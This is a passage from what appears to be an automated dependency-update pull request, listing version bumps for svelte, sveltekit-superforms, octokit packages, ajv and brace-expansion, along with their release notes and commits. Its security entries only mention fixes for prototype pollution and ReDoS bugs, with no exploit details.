href=\"https://github.com/sveltejs/svelte/commit/96fd3ce763525ce6276520ca605dba5ece74ae93\"\u003e\u003ccode\u003e96fd3ce\u003c/code\u003e\u003c/a\u003e Version Packages (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/17786\"\u003e#17786\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/1b3e6605190ab8ca21292ddd3ccf2a71387d79fe\"\u003e\u003ccode\u003e1b3e660\u003c/code\u003e\u003c/a\u003e fix: prevent flushed effects from running again (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/17787\"\u003e#17787\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/673a1ab9643644fe31beda33eacfdec9ee1f2668\"\u003e\u003ccode\u003e673a1ab\u003c/code\u003e\u003c/a\u003e fix: set server context after async transformError (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/17799\"\u003e#17799\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/3a289797bd205182e7677f58daf472caf537afc2\"\u003e\u003ccode\u003e3a28979\u003c/code\u003e\u003c/a\u003e fix: handle default parameters scope leaks (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/17788\"\u003e#17788\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/fcdc0289db5e6b0f7cf68cd3988450dad567392f\"\u003e\u003ccode\u003efcdc028\u003c/code\u003e\u003c/a\u003e fix: hydrate if blocks correctly (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/17784\"\u003e#17784\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/97f3ac557158dd7754264dfe735ed83c2ce95e1f\"\u003e\u003ccode\u003e97f3ac5\u003c/code\u003e\u003c/a\u003e Version Packages (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/17775\"\u003e#17775\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/7deedc5bb4fd6d0f033d00fa9741c7141fffd730\"\u003e\u003ccode\u003e7deedc5\u003c/code\u003e\u003c/a\u003e fix: render \u003ccode\u003e:catch\u003c/code\u003e of \u003ccode\u003e#await\u003c/code\u003e block with correct key (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/17769\"\u003e#17769\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/sveltejs/svelte/commits/svelte@5.53.5/packages/svelte\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by [GitHub Actions](\u003ca href=\"https://www.npmjs.com/~GitHub\"\u003ehttps://www.npmjs.com/~GitHub\u003c/a\u003e Actions), a new releaser for svelte since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `sveltekit-superforms` from 1.13.4 to 2.27.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/ciscoheat/sveltekit-superforms/releases\"\u003esveltekit-superforms's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.27.4\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFixed prototype pollution when using \u003ccode\u003edataType: 'json'\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.27.2\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eDevalue version bumped to avoid \u003ca href=\"https://github.com/sveltejs/devalue/security/advisories/GHSA-vj54-72f3-p5jv\"\u003eprototype pollution\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eZod 4 tests working.\u003c/li\u003e\n\u003cli\u003eZod 4 adapter didn't use the correct JSON Schema format for dates.\u003c/li\u003e\n\u003cli\u003eNested data traversal for correcting invalid types didn't stop at a valid value, replacing paths with default data further down the tree.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.27.1\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFixed client validation issue with rapid multiple blur events.\u003c/li\u003e\n\u003cli\u003eArktype adapter improved.\u003c/li\u003e\n\u003cli\u003eUnion schemas now works with default values, replacing invalid properties even if nested.\u003c/li\u003e\n\u003cli\u003eWhen using the \u003ccode\u003e{ taint: 'untaint-form' }\u003c/code\u003e option, form wasn't untainted unless it was modified.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.27.0\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ca href=\"https://arktype.io/\"\u003eArktype\u003c/a\u003e adapter is finally a \u0026quot;full\u0026quot; adapter, meaning it's retrospectable and doesn't require default values anymore!\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eSuperDebug rune version is back, can now be imported as \u003ccode\u003eimport SuperDebug from 'sveltekit-superforms/SuperDebug.svelte';\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFixed \u003ccode\u003ebigint\u003c/code\u003e handling for Zod 4 and Valibot.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.26.1\u003c/h2\u003e\n\u003ch3\u003eRemoved\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eThe SuperDebug rune version broke Svelte 4 compatibility, so it has been removed until a solution can be figured out, hopefully very soon.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eZod 4 adapter now handles top-level discriminated unions.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.26.0\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://zod.dev/\"\u003eZod 4\u003c/a\u003e adapter added! Adapter names are \u003ccode\u003ezod4\u003c/code\u003e and \u003ccode\u003ezod4Client\u003c/code\u003e, works with both the full version and Zod Mini. As Zod is now using its own JSON Schema representation, and there are some breaking changes like how enums are handled, check migrations carefully and please \u003ca href=\"https://github.com/ciscoheat/sveltekit-superforms/issues\"\u003ereport any bugs\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://superforms.rocks/concepts/tainted\"\u003etaintedMessage\u003c/a\u003e now passes \u003ccode\u003eBeforeNavigate\u003c/code\u003e to its callback function.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://superforms.rocks/super-debug\"\u003eSuperDebug\u003c/a\u003e now has a Runes version, see the docs for how to import it.\u003c/li\u003e\n\u003cli\u003eAdded config options to \u003ccode\u003evalibotClient\u003c/code\u003e, same as in the \u003ccode\u003evalibot\u003c/code\u003e adapter.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/ciscoheat/sveltekit-superforms/blob/main/CHANGELOG.md\"\u003esveltekit-superforms's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[2.27.4] - 2025-10-14\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFixed prototype pollution when using \u003ccode\u003edataType: 'json'\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[2.27.2] - 2025-10-03\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eDevalue version bumped to avoid \u003ca href=\"https://github.com/sveltejs/devalue/security/advisories/GHSA-vj54-72f3-p5jv\"\u003eprototype pollution\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eZod 4 tests working.\u003c/li\u003e\n\u003cli\u003eZod 4 adapter didn't use the correct JSON Schema format for dates.\u003c/li\u003e\n\u003cli\u003eNested data traversal for correcting invalid types didn't stop at a valid value, replacing paths with default data further down the tree.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[2.27.1] - 2025-06-27\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFixed client validation issue with rapid multiple blur events.\u003c/li\u003e\n\u003cli\u003eArktype adapter improved.\u003c/li\u003e\n\u003cli\u003eUnion schemas now works with default values, replacing invalid properties even if nested.\u003c/li\u003e\n\u003cli\u003eWhen using \u003ccode\u003e{ taint: 'untaint-form' }\u003c/code\u003e option, form wasn't untainted unless it was modified.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[2.27.0] - 2025-06-16\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ca href=\"https://arktype.io/\"\u003eArktype\u003c/a\u003e adapter is finally a \u0026quot;full\u0026quot; adapter, meaning it's retrospectable and doesn't require default values anymore!\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eSuperDebug rune version is back, can now be imported as \u003ccode\u003eimport SuperDebug from 'sveltekit-superforms/SuperDebug.svelte';\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFixed \u003ccode\u003ebigint\u003c/code\u003e handling for Zod 4 and Valibot.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[2.26.1] - 2025-06-05\u003c/h2\u003e\n\u003ch3\u003eRemoved\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eThe SuperDebug rune version broke Svelte 4 compatibility, so it has been removed until a solution can be figured out, hopefully very soon.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eZod 4 adapter now handles top-level discriminated unions.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[2.26.0] - 2025-06-04\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ciscoheat/sveltekit-superforms/commit/34f1abf0c8992213c9bcc571c1f13e09b539db71\"\u003e\u003ccode\u003e34f1abf\u003c/code\u003e\u003c/a\u003e 2.27.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ciscoheat/sveltekit-superforms/commit/4a1310dd1a94176bb22036662c530dad48059ca4\"\u003e\u003ccode\u003e4a1310d\u003c/code\u003e\u003c/a\u003e Fixed prototype pollution when using dataType: 'json'\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ciscoheat/sveltekit-superforms/commit/58faeb9f7d9b73d8f9724a92519e6bb55a07f4ee\"\u003e\u003ccode\u003e58faeb9\u003c/code\u003e\u003c/a\u003e 2.27.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ciscoheat/sveltekit-superforms/commit/fe94fa8f37d4ef11f49b1c79809a763123af5a7d\"\u003e\u003ccode\u003efe94fa8\u003c/code\u003e\u003c/a\u003e Fixed prototype pollution when using dataType: 'json'\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ciscoheat/sveltekit-superforms/commit/0880f91fef0473ead2a4a690699860bf8847ee5d\"\u003e\u003ccode\u003e0880f91\u003c/code\u003e\u003c/a\u003e Type check in tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ciscoheat/sveltekit-superforms/commit/1576ab4f1667557deba6853d6c7bca362444601a\"\u003e\u003ccode\u003e1576ab4\u003c/code\u003e\u003c/a\u003e More svelte compiler fixes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ciscoheat/sveltekit-superforms/commit/49bb41323ba437ebb3aaaeb1db7615fefa995ebe\"\u003e\u003ccode\u003e49bb413\u003c/code\u003e\u003c/a\u003e Linter fix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ciscoheat/sveltekit-superforms/commit/a2923221e3cadaa92ec8fcace5ce2715eb3af7e5\"\u003e\u003ccode\u003ea292322\u003c/code\u003e\u003c/a\u003e Turned off new svelte eslint rule\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ciscoheat/sveltekit-superforms/commit/e77f33c23ed9ad11f01ee787dd086e9d296f5355\"\u003e\u003ccode\u003ee77f33c\u003c/code\u003e\u003c/a\u003e Removed debug output from tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ciscoheat/sveltekit-superforms/commit/22689d4e13e6e85f51bf2581ec380acbc8ff67ea\"\u003e\u003ccode\u003e22689d4\u003c/code\u003e\u003c/a\u003e 2.27.2\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/ciscoheat/sveltekit-superforms/compare/v1.13.4...v2.27.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/endpoint` from 9.0.5 to 9.0.6\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/endpoint.js/releases\"\u003e\u003ccode\u003e@​octokit/endpoint\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev9.0.6\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/endpoint.js/compare/v9.0.5...v9.0.6\"\u003e9.0.6\u003c/a\u003e (2025-02-14)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/endpoint.js/issues/515\"\u003e#515\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/endpoint.js/commit/599ff4f76534ea2872f40b41c4ffbbcca987d6a5\"\u003e599ff4f\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/endpoint.js/commit/599ff4f76534ea2872f40b41c4ffbbcca987d6a5\"\u003e\u003ccode\u003e599ff4f\u003c/code\u003e\u003c/a\u003e fix: ReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/endpoint.js/issues/515\"\u003e#515\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/octokit/endpoint.js/compare/v9.0.5...v9.0.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/plugin-paginate-rest` from 9.2.1 to 9.2.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/releases\"\u003e\u003ccode\u003e@​octokit/plugin-paginate-rest\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev9.2.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v9.2.1...v9.2.2\"\u003e9.2.2\u003c/a\u003e (2025-02-15)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/660\"\u003e#660\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/e1e44898cf1870f1496ae7f5b2a4476c71044e6b\"\u003ee1e4489\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/e1e44898cf1870f1496ae7f5b2a4476c71044e6b\"\u003e\u003ccode\u003ee1e4489\u003c/code\u003e\u003c/a\u003e fix: ReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/660\"\u003e#660\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v9.2.1...v9.2.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/request-error` from 5.1.0 to 5.1.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/request-error.js/releases\"\u003e\u003ccode\u003e@​octokit/request-error\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.1.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v5.1.0...v5.1.1\"\u003e5.1.1\u003c/a\u003e (2025-02-14)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eReDos regex vulnerability, reported by \u003ca href=\"https://github.com/dayshift\"\u003e\u003ccode\u003e@​dayshift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://github.com/octokit/request-error.js/commit/12a14f03dbfbbdc759c1c20a631b277892da09de\"\u003e12a14f0\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/b51ed2766807a5ca59b5ba477762e84171ccca53\"\u003e\u003ccode\u003eb51ed27\u003c/code\u003e\u003c/a\u003e test: ReDos regex vulnerability, reported by \u003ca href=\"https://github.com/dayshift\"\u003e\u003ccode\u003e@​dayshift\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/12a14f03dbfbbdc759c1c20a631b277892da09de\"\u003e\u003ccode\u003e12a14f0\u003c/code\u003e\u003c/a\u003e fix: ReDos regex vulnerability, reported by \u003ca href=\"https://github.com/dayshift\"\u003e\u003ccode\u003e@​dayshift\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/octokit/request-error.js/compare/v5.1.0...v5.1.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/request` from 8.3.1 to 8.4.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/request.js/releases\"\u003e\u003ccode\u003e@​octokit/request\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev8.4.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v8.4.0...v8.4.1\"\u003e8.4.1\u003c/a\u003e (2025-02-15)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/741\"\u003e#741\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/356411e3217019aa9fc8a68f4236af82490873c2\"\u003e356411e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev8.4.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v8.3.1...v8.4.0\"\u003e8.4.0\u003c/a\u003e (2024-04-09)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ere-add \u003ccode\u003eredirect\u003c/code\u003e request option (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/636\"\u003e#636\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/abc4955217d7626200844b75321be3ac73ef95f6\"\u003eabc4955\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/octokit/request.js/issues/599\"\u003e#599\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/356411e3217019aa9fc8a68f4236af82490873c2\"\u003e\u003ccode\u003e356411e\u003c/code\u003e\u003c/a\u003e fix: ReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/741\"\u003e#741\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/abc4955217d7626200844b75321be3ac73ef95f6\"\u003e\u003ccode\u003eabc4955\u003c/code\u003e\u003c/a\u003e feat: re-add \u003ccode\u003eredirect\u003c/code\u003e request option (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/636\"\u003e#636\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/octokit/request.js/compare/v8.3.1...v8.4.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `ajv` from 6.12.6 to 6.14.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/e3af0a723b4b7ad86eff43be355c706d31e0e915\"\u003e\u003ccode\u003ee3af0a7\u003c/code\u003e\u003c/a\u003e 6.14.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/b552ed66191eb338498df3196065c777e3bb71f2\"\u003e\u003ccode\u003eb552ed6\u003c/code\u003e\u003c/a\u003e add regExp option to address $data exploit via a regular expression (CVE-2025...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/72f228665859eed5e2be3a66f8c4a7aff6b34dcf\"\u003e\u003ccode\u003e72f2286\u003c/code\u003e\u003c/a\u003e docs: update v7 info\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/231e52b3bca62559202b95e5fb5cee02145b226a\"\u003e\u003ccode\u003e231e52b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/ajv-validator/ajv/issues/1320\"\u003e#1320\u003c/a\u003e from philsturgeon/patch-1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/d3475fc20416c33fe030c8aa3b09fa411f325bbd\"\u003e\u003ccode\u003ed3475fc\u003c/code\u003e\u003c/a\u003e Add spectral, an AJV util from a sponsor\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/413afe01f518ea74d1740a7cb211df787c585544\"\u003e\u003ccode\u003e413afe0\u003c/code\u003e\u003c/a\u003e docs: v7.0.0-beta.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/11e997bda2f3eecb445c1e5a07d96ef7e81c5f5d\"\u003e\u003ccode\u003e11e997b\u003c/code\u003e\u003c/a\u003e update readme for v7\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/ajv-validator/ajv/compare/v6.12.6...v6.14.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `brace-expansion` from 1.1.11 to 1.1.12\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/juliangruber/brace-expansion/releases\"\u003ebrace-expansion's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.1.12\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003epkg: publish on tag 1.x  c460dbd\u003c/li\u003e\n\u003cli\u003efmt  ccb8ac6\u003c/li\u003e\n\u003cli\u003eFix potential ReDoS Vulnerability or Inefficient Regular Expression (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/65\"\u003e#65\u003c/a\u003e)  c3c73c8\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr /\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/compare/v1.1.11...v1.1.12\"\u003ehttps://github.com/juliangruber/brace-expansion/compare/v1.1.11...v1.1.12\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/44f33b47c5c6a965d507421af43e86cf5971d711\"\u003e\u003ccode\u003e44f33b4\u003c/code\u003e\u003c/a\u003e 1.1.12\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/c460dbd68e428d147b2080622d8ce126c7a08570\"\u003e\u003ccode\u003ec460dbd\u003c/code\u003e\u003c/a\u003e pkg: publish on tag 1.x\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/ccb8ac6d4292b7661b677fe048ba6690c877f51f\"\u003e\u003ccode\u003eccb8ac6\u003c/code\u003e\u003c/a\u003e fmt\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/c3c73c8b088defc70851843be88ccc3af08e7217\"\u003e\u003ccode\u003ec3c73c8\u003c/code\u003e\u003c/a\u003e Fix potential ReDoS Vulnerability or Inefficient Regular Expression (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/65\"\u003e#65\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/juliangruber/brace-expansion/compare/1.1.11...v1.1.12\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `braces` from 3.0.2 to 3.0.3\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/74b2db2938fad48a2ea54a9c8bf27a37a62c350d\"\u003e\u003ccode\u003e74b2db2\u003c/code\u003e\u003c/a\u003e 3.0.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/88f1429a0f47e1dd3813de35211fc97ffda27f9e\"\u003e\u003ccode\u003e88f1429\u003c/code\u003e\u003c/a\u003e update eslint. lint, 